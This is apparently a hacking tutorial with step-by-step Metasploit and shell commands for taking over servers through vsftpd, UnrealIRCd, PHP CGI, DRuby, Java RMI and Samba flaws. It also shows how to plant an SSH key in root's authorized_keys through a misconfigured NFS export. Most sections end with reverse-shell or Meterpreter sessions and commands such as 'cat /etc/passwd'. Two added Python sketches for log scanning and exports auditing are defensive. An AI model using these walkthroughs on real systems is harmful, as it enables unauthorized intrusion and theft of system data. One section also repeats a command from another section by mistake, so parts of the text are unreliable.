Hacking UNIX FTP Server via VSFTP:
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 msf > nmap -sV -p 21
(This shows whether there is an FTP service on the target and port 21 is open.)
 msf > search vsftp
(Available exploits will be shown.)
 msf > use exploit/unix/ftp/vsftpd_234_backdoor
 msf > info exploit/unix/ftp/vsftpd_234_backdoor
 msf > show options
 msf > set RHOST
 msf > show payloads
(You will get the available payloads.)
 msf > set payload cmd/unix/interact
 msf > exploit
(Game over: the target is under your control and you have the victim's terminal shell.)
You can run the following commands on the victim shell:

id
uname -a
ifconfig
whoami
cat /etc/passwd
Type exit, and exit again.

Hacking UNIX Server via UnrealIRCd 3.2.8.1 backdoor:
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 msf > nmap -sV -p 6667
(This shows whether there is an UnrealIRCd service on the target and port 6667 is open.)
 msf > search unrealircd
(Available exploits will be shown.)
 msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
 msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
 msf > show options
 msf > set RHOST
 msf > show payloads
(You will get a list of all available payloads.)
 msf > exploit


Hacking Web Server via PHP CGI Argument Injection:
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 msf > nmap -sV -p 80
(This shows whether there is an Apache httpd 2.2.8 ((Ubuntu) DAV/2) on the target and port 80 is open.)
Type the IP address of the vulnerable web server, like http://192.168.132.9/phpmyadmin/
(You will get the phpMyAdmin page. If you type the address with ?-s appended, like http://192.168.132.9/phpmyadmin/?-s, it will show the server-side code.)

 msf > search php_cgi
(Available exploits will be shown.)
 msf > info exploit/multi/http/php_cgi_arg_injection
 msf > use exploit/multi/http/php_cgi_arg_injection
 msf > show payloads
(You will get a list of all available payloads.)
 msf > set payload php/meterpreter/reverse_tcp
 msf > show options
 msf > set RHOST (if required)
 msf > set LHOST (if required)
 msf > exploit
You will get a meterpreter session in which you can run several remote shell commands, like the ones below.
sysinfo
ls
cat index.php
(You can now see the source code of index.php. GAME OVER)
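
The ?-s check above works because a query string with no unencoded "=" is split on "+", URL-decoded and handed to the CGI binary as command-line arguments (RFC 3875, section 4.4). The following Python sketch is an added example, not part of the original post: it scans web access logs for such requests. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (sample data, not from the original post).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 4145
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /phpmyadmin/?-s HTTP/1.1" 200 9120
192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=-s HTTP/1.1" 200 512
192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?%2Ds HTTP/1.1" 200 9120
192.0.2.13 - - [01/Jan/2024:10:03:00 +0000] "GET /search.php?a+b HTTP/1.1" 200 300
"""

# Client address and request target from a common/combined format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def cgi_switch_tokens(url):
    """Return the query tokens a CGI binary would see as command-line switches."""
    _, sep, query = url.partition("?")
    if not sep or "=" in query:
        # No query, or a normal key=value query: nothing reaches argv.
        return []
    tokens = [unquote(t) for t in query.split("+")]
    return [t for t in tokens if t.lstrip().startswith("-")]

def suspicious_requests(log_text):
    """Return (client_ip, url, switches) for requests carrying switch-like tokens."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        switches = cgi_switch_tokens(m.group(2))
        if switches:
            hits.append((m.group(1), m.group(2), switches))
    return hits

if __name__ == "__main__":
    for ip, url, switches in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested {url} -> argument-like tokens {switches}")
```

A hit on a host that runs PHP as CGI means the request should be investigated and the PHP build updated; the same rule can be applied as a request filter in front of the server.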


DRuby Distributed Ruby Code Execution
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 msf > nmap -sV -p 0-65535
(You will find an unknown service on the target, with port 8787/tcp open.)
 msf > amap 8787
(You can see that the ruby and druby service is running.)
 msf > search drb
 msf > info exploit/linux/misc/drb_remote_codeexec
 msf > use exploit/linux/misc/drb_remote_codeexec
 msf > show payloads
 msf > set payload cmd/unix/reverse
 msf > show options
 msf > set URI druby://:8787
 msf > set LHOST
 msf > exploit
(Game over) You can type the following commands in the remote host session:
id
uname -a
ifconfig
whoami
Press Ctrl+C and y to abort the session.

Java RMI Server – Java Code Execution
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 msf > nmap -sV -p 0-65535
(You will find rmiregistry on the target, with port 1099/tcp open.)
 msf > amap 8787
(You can see ruby and druby service is running)
 msf > search rmiregistry
 msf > info exploit/multi/misc/java_rmi_server
 msf > use exploit/multi/misc/java_rmi_server
 msf > show payloads
 msf > show options
 msf > set RHOST
 msf > exploit
(Game over) You will get a meterpreter session and can type the following commands in the remote host session:
sysinfo
shell
id
uname -a
ifconfig
whoami
cat /etc/passwd
Type exit, and exit again, to abort the session.


Samba -username map script- Remote Command Execution
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 msf > nmap -sV -p 0-65535
(You will find netbios-ssn on the target, with port 139/tcp open.)
 msf > search samba
 msf > info exploit/multi/samba/usermap_script
 msf > use exploit/multi/samba/usermap_script
 msf > set RHOST
 msf > exploit
(Game over) You will get a meterpreter session and can type the following commands in the remote host session:
id
uname -a
ifconfig
whoami
cat /etc/passwd
Press Ctrl+C, then type y, and exit again to abort the session.

NFS Misconfiguration – Access via SSH
Run BackTrack or Kali Linux.
Open a terminal and run Metasploit msfconsole, or start it from the BackTrack menu.
Run the following commands:
 nmap -sV -p 0-65535
(You will find open ports on the target such as ssh 22/tcp, rpcbind 111/tcp and nfs 2049/tcp.)
 ssh root@
(You will get a "permission denied (publickey, password)" message.)
 rpcinfo -p
(You will get all the NFS information for versions 2, 3 and 4.)
 showmount -e
(You can see the export list for <target IP address>.)
 ssh-keygen (This generates the key pair whose public key is used below.)
 mkdir /tmp/test
 mount -t nfs :/ /tmp/test/ -o nolock
 cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
 umount /tmp/test/
 ssh root@
(You will see the NFS share of the remote server and its system information.)
ifconfig
id
uname -a
whoami
cat /etc/passwd
Type exit, and exit again, to abort the session.
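
The steps above only work when the server exports its root filesystem writable and without root squashing, so that a remote root user can append to /root/.ssh/authorized_keys. The following Python sketch is an added example, not part of the original post: it audits an /etc/exports file for that combination. The exports content is constructed sample data and the function name is hypothetical.

```python
import re

# Constructed /etc/exports content (sample data, not taken from the page).
SAMPLE_EXPORTS = """\
# path       client(options)
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/share   192.0.2.0/24(ro,sync,root_squash)
/home        192.0.2.5(rw,sync) *(ro)
/backup      192.0.2.7(rw,no_root_squash)
"""

# One client spec: optional host pattern followed by optional "(opt,opt,...)".
CLIENT_RE = re.compile(r"^([^()]*)(?:\(([^)]*)\))?$")

def audit_exports(text):
    """Return (path, client, issues) for each export entry that has a finding."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()             # assumes no spaces in paths
        for spec in clients or ["*"]:             # no client list = any host
            m = CLIENT_RE.match(spec)
            if not m:
                continue                          # malformed spec, skip it
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            writable = "rw" in opts               # read-only is the default
            root_ok = "no_root_squash" in opts    # root_squash is the default
            issues = []
            if client == "*" and writable:
                issues.append("writable by any host")
            if root_ok:
                issues.append("remote root is not squashed")
            if path == "/":
                issues.append("exports the whole filesystem")
            if writable and root_ok and path in ("/", "/root"):
                issues.append("root's authorized_keys is remotely writable")
            if issues:
                findings.append((path, client, issues))
    return findings

if __name__ == "__main__":
    for path, client, issues in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: " + "; ".join(issues))
```

Entries it reports are fixed by exporting only the directories that are needed, to named hosts, with root_squash left on; run exportfs -ra afterwards to apply the change.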

Caution: do not use this for any illegal activity; if you do, you and only you will be responsible for that.

Send your feedback.
